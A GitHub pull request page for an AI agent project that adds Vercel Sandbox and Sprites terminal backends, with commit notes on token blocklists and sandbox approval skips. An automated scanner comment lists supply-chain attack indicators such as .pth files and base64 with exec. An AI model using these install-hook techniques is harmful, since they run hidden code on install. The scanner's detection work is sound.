feat: add Vercel Sandbox backend#17445
Merged
Merged
Conversation
Adds Vercel Sandbox as a supported Hermes terminal backend alongside existing providers (Local, Docker, Modal, SSH, Daytona, Singularity). Uses the Vercel Python SDK to create/manage cloud microVMs, supports snapshot-based filesystem persistence keyed by task_id, and integrates with the existing BaseEnvironment shell contract and FileSyncManager for credential/skill syncing. Based on #17127 by @scotttrinh, cherry-picked onto current main.
Contributor
🚨 CRITICAL Supply Chain Risk DetectedThis PR contains a pattern that has been used in real supply chain attacks. A maintainer must review the flagged code carefully before merging. 🚨 CRITICAL: Install-hook file added or modifiedThese files can execute code during package installation or interpreter startup. Files: Scanner only fires on high-signal indicators: .pth files, base64+exec/eval combos, subprocess with encoded commands, or install-hook files. Low-signal warnings were removed intentionally — if you're seeing this comment, the finding is worth inspecting. |
Collaborator
|
Salvage of #17127 with stale-branch regressions resolved. Prior PR should be closed in favor of this one. |
Collaborator
|
Salvage of #17127 |
- Add vercel_sandbox to hardline blocklist container bypass test - Add vercel_sandbox to skills_tool remote backend parametrize test - Deduplicate runtime set: doctor.py and setup.py now import _SUPPORTED_VERCEL_RUNTIMES from terminal_tool.py - Add docstring to _run_bash explaining timeout/stdin_data discards - Always stop sandbox during cleanup (unconditional, matching Modal/Daytona) - Update security.md: container bypass text, production tip, comparison table - Update environment-variables.md: TERMINAL_ENV list, Vercel auth vars, TERMINAL_VERCEL_RUNTIME - Update inline comments in cli.py and config.py to include vercel_sandbox
Contributor
🚨 CRITICAL Supply Chain Risk DetectedThis PR contains a pattern that has been used in real supply chain attacks. A maintainer must review the flagged code carefully before merging. 🚨 CRITICAL: Install-hook file added or modifiedThese files can execute code during package installation or interpreter startup. Files: Scanner only fires on high-signal indicators: .pth files, base64+exec/eval combos, subprocess with encoded commands, or install-hook files. Low-signal warnings were removed intentionally — if you're seeing this comment, the finding is worth inspecting. |
19 tasks
4 tasks
kylemclaren
added a commit
to kylemclaren/hermes-agent
that referenced
this pull request
May 22, 2026
Several cross-cutting registrations only listed the prior sandboxed backends (docker / singularity / modal / daytona / vercel_sandbox); Sprites is also a remote, hardware-isolated sandbox and needs the same treatment. Without this, the agent path on a Sprites backend hits false dangerous-command approval prompts, leaks SPRITES_TOKEN to local- backend subprocesses, and silently drops container_persistent overrides from the code_execution_tool / file_tools dispatch paths. - tools/approval.py: add "sprites" to both sandboxed-backend skip sets (the agent's command is running inside the Sprite, not on the host — same isolation guarantee as the other cloud backends). - tools/environments/local.py: add SPRITES_TOKEN / SPRITE_TOKEN to the provider env blocklist so they are stripped from local-backend child process environments (matches the VERCEL_*, DAYTONA_API_KEY, and MODAL_TOKEN_* treatment). - tools/skills_tool.py: add "sprites" to _REMOTE_ENV_BACKENDS so the skills tool routes its remote/local distinction correctly. - tools/file_tools.py: add "sprites" to the container_config dispatch set so container_persistent: false can take effect through the file-tool code path. - tools/code_execution_tool.py: same dispatch fix (I had removed it in 015e4fe5b on the grounds that sprites ignores CPU/memory/disk — but container_persistent IS honored). - hermes_cli/web_server.py: add "sprites" to the dashboard's terminal.backend select-control options. Surfaced by comparing this branch against NousResearch#17445 (the Vercel Sandbox backend PR), which had to make every one of these registrations explicitly. Same audit applies here. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
kylemclaren
added a commit
to kylemclaren/hermes-agent
that referenced
this pull request
May 22, 2026
Mirrors the placement vercel_sandbox got in PR NousResearch#17445: - features/tools.md: row in the backend comparison table, "sprites" added to the backend-enum comment, and a dedicated "Sprites (Fly.io)" subsection covering install + auth, the hermes-{task_id} resume model, the restricted-token recommendation for CI / shared envs, the persistence semantics, and the "no sync-back, by design" rationale. - security.md: container-bypass info note and production-tip paragraph both mention sprites; comparison table gains a row showing dangerous-command checks are skipped (because the Sprite is the security boundary). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Salvage of #17127 by @scotttrinh — cherry-picked onto current
mainto avoid stale-branch regressions.What this PR does: Adds Vercel Sandbox as a supported Hermes terminal backend alongside existing providers (Local, Docker, Modal, SSH, Daytona, Singularity). Uses the Vercel Python SDK to create/manage cloud microVMs, supports snapshot-based filesystem persistence keyed by task_id, and integrates with the existing
BaseEnvironmentshell contract andFileSyncManagerfor credential/skill syncing.Why salvage was needed
The original PR was 115 commits behind
main. Itsgateway/run.pydiff included 128 lines of unrelated deletions that would silently revert ~12 recently-merged features (platform connect timeout, cfg_get migration, tilde expansion, docker bridges, progress bubble reset, curator cron tick, etc.).Changes from original PR
Commit 1 (cherry-pick by @scotttrinh):
vercel_runtimebridge) — all stale-branch regressions discardedcfg_getimport after conflict resolutionCommit 2 (self-review follow-up):
vercel_sandboxto hardline blocklist container bypass testvercel_sandboxto skills_tool remote backend parametrize testdoctor.pyandsetup.pynow import_SUPPORTED_VERCEL_RUNTIMESfromterminal_tool.py(was hardcoded 5×)_run_bashexplainingtimeout/stdin_datadiscardssecurity.md: container bypass text, production tip, comparison tableenvironment-variables.md:TERMINAL_ENVlist, Vercel auth vars,TERMINAL_VERCEL_RUNTIMEcli.pyandconfig.pyto includevercel_sandboxTest results